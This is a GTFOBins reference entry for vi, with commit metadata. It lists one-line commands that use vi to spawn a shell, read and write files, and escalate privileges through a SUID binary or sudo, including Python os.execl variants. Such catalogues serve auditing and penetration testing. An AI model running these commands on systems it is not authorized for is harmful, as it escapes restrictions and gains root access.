GTFOBins.github.io/_gtfobins/vi.md
Andrea Cardaci 32b113b003 Fix and add SUID to other vi
Related to #39.
2018-12-03 16:00:11 +01:00

834 B

functions
shell file-write file-read suid sudo
code
vi -c ':!/bin/sh'
code
vi :set shell=/bin/sh :shell
description code
This requires that `vi` is compiled with Python support. vi -c ':py import os; os.execl("/bin/sh", "sh", "-c", "reset; exec sh")'
code
vi file_to_write iDATA ^[ w
code
vi file_to_read
code
./vi -c ':!/bin/sh -p'
description code
This requires that `vi` is compiled with Python support. ./vi -c ':py import os; os.execl("/bin/sh", "sh", "-pc", "reset; exec sh -p")'
code
sudo vi -c ':!/bin/sh'
description code
This requires that `vi` is compiled with Python support. sudo vi -c ':py import os; os.execl("/bin/sh", "sh", "-c", "reset; exec sh")'